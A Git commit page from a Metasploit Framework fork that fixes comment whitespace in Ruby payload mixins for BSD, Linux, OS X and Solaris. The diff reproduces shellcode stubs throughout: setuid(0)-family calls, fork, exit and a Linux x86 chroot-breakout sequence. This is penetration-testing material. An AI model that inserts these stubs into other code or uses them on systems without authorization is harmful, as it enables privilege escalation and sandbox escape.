dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

fix more whitespace issues

This commit is contained in:
Brent Cook 2018-05-01 05:23:26 -05:00
parent 34f8a9a5ee
commit 1456bbdaec
5 changed files with 269 additions and 269 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
lib/msf/core/payload/bsd.rb
View File

@ -93,69 +93,69 @@ module Msf::Payload::Bsd
def handle_x64_bsd_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x4d" +# or rax, 77 (setgid=311>>2=77)
"\x48\xc1\xe0\x02" +# shl rax, 2
"\x48\x83\xf0\x03" +# xor rax, 3 (311&3=3)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x48\x31\xd2" +# xor rdx, rdx 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x4d" + # or rax, 77 (setgid=311>>2=77)
"\x48\xc1\xe0\x02" + # shl rax, 2
"\x48\x83\xf0\x03" + # xor rax, 3 (311&3=3)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x48\x31\xd2" + # xor rdx, rdx 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x7e" +# or rax, 126 (setreuid=126)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x7e" + # or rax, 126 (setreuid=126)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x17" +# or rax, 23 (setuid=23)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x17" + # or rax, 23 (setuid=23)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x4e" +# or rax, 78 (setgid=312>>2=78)
"\x48\xc1\xe0\x02" +# shl rax, 2 (78<<2=312)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x48\x31\xd2" +# xor rdx, rdx 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x4e" + # or rax, 78 (setgid=312>>2=78)
"\x48\xc1\xe0\x02" + # shl rax, 2 (78<<2=312)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x48\x31\xd2" + # xor rdx, rdx 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x7f" +# or rax, 127 (setuid=127)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x7f" + # or rax, 127 (setuid=127)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x5a" +# or rax, 90 (setgid=181>>1=90)
"\x48\xd1\xe0" +# shl rax, 1
"\x48\x83\xc8\x01" +# or rax, 1 (setgid=181&1=1)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x5a" + # or rax, 90 (setgid=181>>1=90)
"\x48\xd1\xe0" + # shl rax, 1
"\x48\x83\xc8\x01" + # or rax, 1 (setgid=181&1=1)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x01" +# or rax, 1 (exit=1)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
app << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x01" + # or rax, 1 (exit=1)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
end

80
lib/msf/core/payload/bsd/x86.rb
View File

@ -59,70 +59,70 @@ module X86
def handle_x86_bsd_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x66\xb8\x37\x01" + # movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7e" + # movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x66\xb8\x38\x01" + # movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7f" + # movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xb5" + # movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end

208
lib/msf/core/payload/linux.rb
View File

@ -99,113 +99,113 @@ module Msf::Payload::Linux
# Prepend
if (datastore['PrependFork'])
pre << "\x6a\x02" +# pushb $0x2 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 ; fork #
"\x85\xc0" +# test %eax,%eax #
"\x74\x06" +# jz 0xf #
"\x31\xc0" +# xor %eax,%eax #
"\xb0\x01" +# movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
pre << "\x6a\x02" + # pushb $0x2 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 ; fork #
"\x85\xc0" + # test %eax,%eax #
"\x74\x06" + # jz 0xf #
"\x31\xc0" + # xor %eax,%eax #
"\xb0\x01" + # movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xa4" +# movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\xf7\xe3" + # mull %ebx #
"\xb0\xa4" + # movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x46" + # pushl $0x46 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x17" +# pushl $0x17 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x17" + # pushl $0x17 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\xf7\xe3" + # mull %ebx #
"\xb0\xaa" + # movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x47" + # pushl $0x47 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x2e" + # pushl $0x2e #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x46" + # pushl $0x46 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
# break chroot
pre << "\x6a\x3d" +# pushl $0x3d #
pre << "\x6a\x3d" + # pushl $0x3d #
# build dir str (ptr in ebx)
"\x89\xe3" +# movl %esp,%ebx #
"\x89\xe3" + # movl %esp,%ebx #
# mkdir(dir)
"\x6a\x27" +# pushl $0x27 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x6a\x27" + # pushl $0x27 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
# chroot(dir)
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x89\xd9" + # movl %ebx,%ecx #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
# build ".." str (ptr in ebx)
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
"\x89\xe3" +# movl %esp,%ebx #
"\x66\x68\x2e\x2e" + # pushw $0x2e2e #
"\x89\xe3" + # movl %esp,%ebx #
# loop changing dir
"\x6a\x3d" +# pushl $0x1e #
"\x59" +# popl %ecx #
"\xb0\x0c" +# movb $0xc,%al #
"\xcd\x80" +# int $0x80 #
"\xe2\xfa" +# loop -6 #
"\x6a\x3d" + # pushl $0x1e #
"\x59" + # popl %ecx #
"\xb0\x0c" + # movb $0xc,%al #
"\xcd\x80" + # int $0x80 #
"\xe2\xfa" + # loop -6 #
# final chroot
"\x6a\x3d" +# pushl $0x3d #
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
"\x6a\x3d" + # pushl $0x3d #
"\x89\xd9" + # movl %ebx,%ecx #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
# Append exit(0)
if (datastore['AppendExit'])
app << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x01" +# pushl $0x01 #
"\x58" +# popl %eax #
app << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x01" + # pushl $0x01 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
@ -216,65 +216,65 @@ module Msf::Payload::Linux
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" + # addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x18" + # addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\xab" + # addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x48" + # addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" + # addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
# EEK! unsupported...
end
@ -282,10 +282,10 @@ module Msf::Payload::Linux
# Append exit(0)
if (datastore['AppendExit'])
app << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
app << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x02" + # addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
end
elsif (test_arch.include?(ARCH_X64))

118
lib/msf/core/payload/osx.rb
View File

@ -78,48 +78,48 @@ module Msf::Payload::Osx
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7e" + # movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7f" + # movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xb5" + # movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end
@ -127,56 +127,56 @@ module Msf::Payload::Osx
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x7e" + # or r8, 126 (setreuid=126)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x17" + # or r8, 23 (setuid=23)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x7f" + # or r8, 127 (setregid=127)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" +# shl r8, 23
"\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" +# shl r8, 1
"\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" + # shl r8, 23
"\x49\x83\xc8\x5a" + # or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" + # shl r8, 1
"\x49\x83\xc8\x01" + # or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
app << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x01" + # or r8, 1 (exit=1)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
end

54
lib/msf/core/payload/solaris.rb
View File

@ -75,55 +75,55 @@ module Msf::Payload::Solaris
if (test_arch.include?(ARCH_X86))
# Syscall code
sc = "\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
"\x6a\x65" +# pushl $0x65 #
"\x89\xe6" +# movl %esp,%esi #
"\xf7\x56\x04" +# notl 0x04(%esi) #
"\xf6\x16" # notb (%esi) #
sc = "\x68\xff\xd8\xff\x3c" + # pushl $0x3cffd8ff #
"\x6a\x65" + # pushl $0x65 #
"\x89\xe6" + # movl %esp,%esi #
"\xf7\x56\x04" + # notl 0x04(%esi) #
"\xf6\x16" # notb (%esi) #
# Prepend
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xca" +# movb $0xca,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xca" + # movb $0xca,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xcb" +# movb $0xcb,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xcb" + # movb $0xcb,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x2e" +# movb $0x2e,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x2e" + # movb $0x2e,%al #
"\xff\xd6" # call *%esi #
end
# Append
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xff\xd6" # call *%esi #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xff\xd6" # call *%esi #
end
# Prepend syscall code to prepend block